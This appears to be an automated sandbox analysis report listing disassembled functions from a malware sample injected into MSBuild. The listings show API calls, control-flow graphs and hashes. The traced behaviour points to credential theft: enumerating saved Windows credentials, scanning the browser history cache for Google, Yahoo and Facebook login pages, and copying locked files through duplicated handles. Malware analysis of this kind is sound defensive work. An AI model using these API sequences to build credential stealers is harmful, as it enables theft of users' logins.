                                                                                                                                            Similarity
                                                                                                                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                            • API String ID: 1344430650-1740548384
                                                                                                                                            • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                            • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                            Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                            • String ID: bhv
                                                                                                                                            • API String ID: 4234240956-2689659898
                                                                                                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                            Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                            • API String ID: 2941347001-70141382
                                                                                                                                            • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                            • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                            Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 701 44671d-446726 699->701 702 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->702 704 446747-44674b 701->704 705 446728-44672d 701->705 710 4467ac-4467b7 __setusermatherr 702->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 702->711 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 709 446755-446758 706->709 708->700 712 44673d-446745 708->712 709->702 710->711 715 446810-446819 711->715 716 44681e-446825 711->716 712->709 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 722 446834-446838 718->722 723 44683a-44683e 718->723 720 446845-44684b 719->720 721 446872-446877 719->721 725 446853-446864 GetStartupInfoW 720->725 726 44684d-446851 720->726 721->719 722->718 722->723 723->720 727 446840-446842 723->727 729 446866-44686a 725->729 730 446879-44687b 725->730 726->725 726->727 727->720 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2827331108-0
                                                                                                                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                            Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0040C298
                                                                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                            • wcschr.MSVCRT ref: 0040C324
                                                                                                                                            • wcschr.MSVCRT ref: 0040C344
                                                                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                            • String ID: visited:
                                                                                                                                            • API String ID: 1157525455-1702587658
                                                                                                                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                            Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 free 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                            • memset.MSVCRT ref: 0040E1BD
                                                                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                            • free.MSVCRT ref: 0040E28B
                                                                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                            • API String ID: 2804212203-2982631422
                                                                                                                                            • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                            • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                            Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                            • memset.MSVCRT ref: 0040BC75
                                                                                                                                            • memset.MSVCRT ref: 0040BC8C
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 115830560-3916222277
                                                                                                                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                            Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError free 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 free 870->877 871->870 877->855
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                            • free.MSVCRT ref: 0041848B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile$ErrorLastfree
                                                                                                                                            • String ID: |A
                                                                                                                                            • API String ID: 77810686-1717621600
                                                                                                                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                            Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0041249C
                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                            • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                            • String ID: r!A
                                                                                                                                            • API String ID: 2791114272-628097481
                                                                                                                                            • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                            • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                            Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                            • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                            • API String ID: 2936932814-4196376884
                                                                                                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                            Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                            • String ID: BIN
                                                                                                                                            • API String ID: 1668488027-1015027815
                                                                                                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                            Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                            • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                            • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                            • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                            • memset.MSVCRT ref: 0040BE91
                                                                                                                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                            • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 697348961-0
                                                                                                                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                            Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 00403CBF
                                                                                                                                            • memset.MSVCRT ref: 00403CD4
                                                                                                                                            • memset.MSVCRT ref: 00403CE9
                                                                                                                                            • memset.MSVCRT ref: 00403CFE
                                                                                                                                            • memset.MSVCRT ref: 00403D13
                                                                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
